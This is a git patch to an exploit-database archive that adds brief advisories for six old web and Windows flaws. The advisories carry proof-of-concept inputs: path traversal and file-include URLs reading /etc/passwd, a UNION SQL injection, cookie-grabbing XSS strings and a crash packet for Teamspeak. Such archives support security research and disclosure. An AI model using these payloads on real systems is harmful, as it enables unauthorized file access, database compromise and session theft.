From 60e5c6c2a0962277a186d3c734127aa1f4e6f805 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 13 Oct 2014 04:45:24 +0000
Subject: [PATCH] Updated 10_13_2014

---
 files.csv | 6 ++++++
 platforms/asp/webapps/34936.txt | 9 +++++++++
 platforms/php/webapps/34935.txt | 7 +++++++
 platforms/php/webapps/34937.txt | 21 +++++++++++++++++++++
 platforms/php/webapps/34939.txt | 20 ++++++++++++++++++++
 platforms/php/webapps/34940.txt | 10 ++++++++++
 platforms/windows/dos/34938.txt | 14 ++++++++++++++
 7 files changed, 87 insertions(+)
 create mode 100755 platforms/asp/webapps/34936.txt
 create mode 100755 platforms/php/webapps/34935.txt
 create mode 100755 platforms/php/webapps/34937.txt
 create mode 100755 platforms/php/webapps/34939.txt
 create mode 100755 platforms/php/webapps/34940.txt
 create mode 100755 platforms/windows/dos/34938.txt

diff --git a/files.csv b/files.csv
index 216b9b475..dcc265309 100755
--- a/files.csv
+++ b/files.csv
@@ -31456,3 +31456,9 @@ id,file,description,date,author,platform,type,port
 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0
 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0
+34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0
+34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
+34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0
+34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
+34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
+34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
diff --git a/platforms/asp/webapps/34936.txt b/platforms/asp/webapps/34936.txt
new file mode 100755
index 000000000..92cfa73fa
--- /dev/null
+++ b/platforms/asp/webapps/34936.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44467/info
+
+i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to download and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
+
+i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected.
+
+http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir
\ No newline at end of file
diff --git a/platforms/php/webapps/34935.txt b/platforms/php/webapps/34935.txt
new file mode 100755
index 000000000..392d355b7
--- /dev/null
+++ b/platforms/php/webapps/34935.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/44457/info
+
+LES PACKS is prone to an SQL-injection vulnerability.
+
+An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks.
+
+http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15
\ No newline at end of file
diff --git a/platforms/php/webapps/34937.txt b/platforms/php/webapps/34937.txt
new file mode 100755
index 000000000..3d120a2f3
--- /dev/null
+++ b/platforms/php/webapps/34937.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/44501/info
+
+Feindura CMS is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Feindura CMS versions 1.0rc and prior are vulnerable.
+
+Local file Include:
+
+http://www.example.com/[path]/library/process/download.php?filename=[path/to/file]
+
+http://www.example.com/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
+
+http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00
+
+Cross Site Scripting:
+
+http://www.example.com/[path]/library/sites/editor.php?category=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/34939.txt b/platforms/php/webapps/34939.txt
new file mode 100755
index 000000000..6bdeb9b3b
--- /dev/null
+++ b/platforms/php/webapps/34939.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/44507/info
+
+W-Agora is prone to multiple local file-include vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to view and execute local files within the context of the webserver process or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+W-Agora 4.1.5 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
+http://www.example.com/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
+'conf' folder:
+http://www.example.com/news/for-print.php3?bn=1
+http://www.example.com/news/login.php3?bn=1
+
+Any folder (only on Windows-servers):
+http://www.example.com/news/for-print.php3?bn=..\1
+http://www.example.com/news/login.php3?bn=..\1
\ No newline at end of file
diff --git a/platforms/php/webapps/34940.txt b/platforms/php/webapps/34940.txt
new file mode 100755
index 000000000..5a3a3126c
--- /dev/null
+++ b/platforms/php/webapps/34940.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/44510/info
+
+212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
+
+212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
+http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula
\ No newline at end of file
diff --git a/platforms/windows/dos/34938.txt b/platforms/windows/dos/34938.txt
new file mode 100755
index 000000000..a9e3f6bfb
--- /dev/null
+++ b/platforms/windows/dos/34938.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/44502/info
+
+Teamspeak is prone to a memory-corruption vulnerability.
+
+Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
+
+Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Teamspeak version 2.0.32.60 is vulnerable.
+
+The following proof-of-concept packet is available:
+f2be000426ad7e00300000000001000a414141414141414141424141414141
+4141414141414141414141414141414141414100ff99414141424242424141
+414141414141414141
\ No newline at end of file